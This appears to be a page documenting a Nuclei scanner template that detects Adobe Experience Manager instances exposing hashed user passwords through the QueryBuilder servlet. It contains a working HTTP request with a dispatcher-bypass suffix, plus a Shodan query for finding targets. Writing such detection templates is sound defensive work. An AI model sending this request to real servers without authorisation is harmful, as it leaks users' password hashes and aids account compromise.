Skip to content

Query hashed password via QueryBuilder Servlet

ID: aem-hash-querybuilder

Severity: medium

Author: DhiyaneshDk

Tags: aem,misconfig

AEM hased password can be queried via QueryBuilder Servlet.

id: aem-hash-querybuilder
info:
name: Query hashed password via QueryBuilder Servlet
author: DhiyaneshDk
severity: medium
description: AEM hased password can be queried via QueryBuilder Servlet.
reference:
- https://twitter.com/AEMSecurity/status/1372392101829349376
classification:
cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
product: acs_aem_commons
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,misconfig
http:
- raw:
- |
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"success":true'
- 'rep:password'
condition: and
# digest: 490a00463044022033fc5bd5795df2a06a10d63c8642552f56b20462f231ad98cf90b45c2d3461710220783fb9a3b2f96828b63284079e0751af43e399e2974717e6d1f918785b15ecdc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/misconfiguration/aem/aem-hash-querybuilder.yaml"

View on Github